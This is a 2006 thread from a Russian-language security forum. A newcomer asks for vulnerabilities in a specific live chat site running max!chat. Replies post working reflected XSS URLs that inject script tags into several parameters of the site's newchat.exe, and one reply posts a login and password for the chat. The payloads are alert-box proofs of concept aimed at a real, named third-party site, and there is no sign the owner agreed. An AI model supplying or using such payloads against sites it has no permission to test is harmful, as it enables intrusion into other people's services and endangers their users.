ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

max!chat
  #1  
Старый 23.03.2006, 15:51
nicklon
Новичок
Регистрация: 23.03.2006
Сообщений: 4
Провел на форуме:
3932

Репутация: 0
По умолчанию max!chat

Пипл, помогите определить уязвимости в чате на http://max-club.ru/ используется ПО max!chat исходников нигде не видел, в самом чате все режется блин
 
Ответить с цитированием

  #2  
Старый 23.03.2006, 20:50
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
Exclamation

Логин и пасс в студию!

а так вообще вот...
_http://www.max-club.ru/cgi/newchat.exe?Get='<script>alert('passive_XSS_by_DRO N-ANARCHY')</script>AuthorizedTop&Room=Enter

Последний раз редактировалось DRON-ANARCHY; 23.03.2006 в 20:55..
 
Ответить с цитированием

  #3  
Старый 23.03.2006, 20:57
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Да и вообще..времени щас протсо нету....
_http://www.max-club.ru/cgi/newchat.exe?TEST=<script>alert('passive_XXS_by_DRO N-ANARCHY')</script>
 
Ответить с цитированием

  #4  
Старый 24.03.2006, 10:34
nicklon
Новичок
Регистрация: 23.03.2006
Сообщений: 4
Провел на форуме:
3932

Репутация: 0
По умолчанию

подробнее мона?
 
Ответить с цитированием

  #5  
Старый 24.03.2006, 23:50
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Ну что? Получилось?
Кстати, логин и пасс все-таки выложи...
 
Ответить с цитированием

  #6  
Старый 25.03.2006, 02:02
Антошка2003
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме:
3238231

Репутация: 165


По умолчанию

Логин:antichat
пасс:qwe123
_http://www.max-club.ru/cgi/newchat.exe?Com=Go&Get=Info&Login=<script>alert()</script>&Room=Enter&SID=chat
Набит пассивными ксс

Последний раз редактировалось Антошка2003; 25.03.2006 в 02:10..
 
Ответить с цитированием

  #7  
Старый 25.03.2006, 14:32
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию

Ну я приблизително это и описал.. там мона и аод Form и под Get и под еще много чего пихать хсс принцип один...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ